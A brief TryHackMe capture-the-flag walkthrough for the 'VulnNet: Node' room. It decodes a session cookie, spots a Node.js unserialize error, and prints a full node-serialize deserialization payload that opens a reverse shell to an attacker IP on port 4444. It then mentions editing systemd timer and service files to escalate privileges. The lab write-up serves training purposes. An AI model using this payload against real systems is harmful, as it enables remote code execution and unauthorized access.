VulnNet: Node TryHackMe WalkThrough
After the previous breach, VulnNet Entertainment states it won't happen again. Can you prove they're wrong?
VulnNet Entertainment has moved its infrastructure and now they’re confident that no breach will happen again. You’re tasked to prove otherwise and penetrate their network.
- Difficulty: Easy
- Web Language: JavaScript
Enumeration
More Enumeration…
Manual Enumeration
- No sensitive data on the source code.
Let’s open burp and catch the data.
Looking the cookie, i can see that the value of session is a base+url encode value.
eyJ1c2VybmFtZSI6Ikd1ZXN0IiwiaXNHdWVzdCI6dHJ1ZSwiZW5jb2RpbmciOiAidXRmLTgifQ%3D%3D
{“username”:”Guest”,”isGuest”:true,”encoding”: “utf-8”}
So, the only way into the machine is through some RCE cause tampering the values of the cookie may not give anything.
Let’s Learn & Hack
- Point to note is that we can see that we have unserialise error.
Let’s use the payload: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#nodejs
Used payload: {“username”:”_$$ND_FUNC$$_function (){(function(){var net = require(‘net’),cp = require(‘child_process’),sh = cp.spawn(‘/bin/sh’, []);var client = new net.Socket();client.connect(4444, ‘10.14.12.48’, function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});})();}()”}
Got the reverse shell as www, and doing a lateral escaltion,
Privilege Escalation
change the .timer and .service file to get the reverse shell.